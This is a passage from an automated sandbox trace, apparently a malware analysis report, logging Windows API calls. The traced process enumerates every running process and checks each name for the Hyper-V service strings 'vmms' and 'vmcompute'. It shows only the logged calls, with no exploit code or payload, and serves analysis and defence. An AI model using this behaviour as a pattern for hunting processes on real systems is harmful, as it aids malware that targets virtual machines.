lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.803] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356fcc0 [0101.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x356fcc0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.803] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0101.803] StrStrIA (lpFirst="conhost.exe", lpSrch="vmms") returned 0x0 [0101.803] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0101.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.804] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356fde0 [0101.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x356fde0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0101.804] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0101.804] StrStrIA (lpFirst="rxodge.exe", lpSrch="vmms") returned 0x0 [0101.804] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0101.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.806] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356fd20 [0101.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x356fd20, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0101.806] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0101.806] StrStrIA (lpFirst="sppsvc.exe", lpSrch="vmms") returned 0x0 [0101.806] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0101.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0101.808] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357f140 [0101.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x357f140, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0101.808] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0101.808] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="vmms") returned 0x0 [0101.808] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 1 [0101.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.809] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356fbe8 [0101.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x356fbe8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TiWorker.exe", lpUsedDefaultChar=0x0) returned 13 [0101.810] lstrcpyA (in: lpString1=0x567fabc, lpString2="TiWorker.exe" | out: lpString1="TiWorker.exe") returned="TiWorker.exe" [0101.810] StrStrIA (lpFirst="TiWorker.exe", lpSrch="vmms") returned 0x0 [0101.810] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 0 [0101.810] CloseHandle (hObject=0x358) returned 1 [0101.810] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x350 [0101.827] Process32FirstW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0101.829] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357f220 [0101.829] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x357f220, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0101.829] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0101.829] StrStrIA (lpFirst="[System Process]", lpSrch="vmcompute") returned 0x0 [0101.829] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0101.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0101.830] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x357e1b8 [0101.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x357e1b8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0101.830] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0101.830] StrStrIA (lpFirst="System", lpSrch="vmcompute") returned 0x0 [0101.830] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0101.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0101.832] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x356fd68 [0101.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x356fd68, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0101.832] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0101.832] StrStrIA (lpFirst="smss.exe", lpSrch="vmcompute") returned 0x0 [0101.832] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.833] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356fd50 [0101.833] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x356fd50, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0101.833] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0101.833] StrStrIA (lpFirst="csrss.exe", lpSrch="vmcompute") returned 0x0 [0101.833] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0101.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.834] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356fcd8 [0101.834] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x356fcd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0101.834] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0101.835] StrStrIA (lpFirst="wininit.exe", lpSrch="vmcompute") returned 0x0 [0101.835] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.836] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356fd08 [0101.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x356fd08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0101.836] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0101.836] StrStrIA (lpFirst="csrss.exe", lpSrch="vmcompute") returned 0x0 [0101.836] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0101.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.837] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356fc48 [0101.837] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x356fc48, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0101.837] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0101.837] StrStrIA (lpFirst="winlogon.exe", lpSrch="vmcompute") returned 0x0 [0101.837] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0101.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0101.914] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356fd80 [0101.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x356fd80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0101.914] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0101.914] StrStrIA (lpFirst="services.exe", lpSrch="vmcompute") returned 0x0 [0101.914] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0101.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.916] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356fdf8 [0101.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x356fdf8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0101.918] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0101.918] StrStrIA (lpFirst="lsass.exe", lpSrch="vmcompute") returned 0x0 [0101.918] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.919] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356fe10 [0101.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356fe10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.921] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.921] StrStrIA (lpFirst="svchost.exe", lpSrch="vmcompute") returned 0x0 [0101.921] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0101.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.923] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356fe40 [0101.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x356fe40, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0101.923] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0101.923] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="vmcompute") returned 0x0 [0101.923] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0101.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0101.925] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356fe70 [0101.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x356fe70, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0101.925] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0101.925] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="vmcompute") returned 0x0 [0101.925] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.927] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356fe88 [0101.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356fe88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.927] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.927] StrStrIA (lpFirst="svchost.exe", lpSrch="vmcompute") returned 0x0 [0101.928] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0101.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0101.929] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e248 [0101.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x357e248, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0101.929] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0101.929] StrStrIA (lpFirst="dwm.exe", lpSrch="vmcompute") returned 0x0 [0101.930] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.932] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356fba0 [0101.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356fba0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.932] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.932] StrStrIA (lpFirst="svchost.exe", lpSrch="vmcompute") returned 0x0 [0101.932] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.934] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356fbb8 [0101.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356fbb8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.934] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.934] StrStrIA (lpFirst="svchost.exe", lpSrch="vmcompute") returned 0x0 [0101.934] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.935] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356fbd0 [0101.936] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356fbd0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.936] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.936] StrStrIA (lpFirst="svchost.exe", lpSrch="vmcompute") returned 0x0 [0101.936] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0101.937] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3570110 [0101.937] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3570110, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0101.938] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0101.938] StrStrIA (lpFirst="svchost.exe", lpSrch="vmcompute") returned 0x0 [0101.938] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, 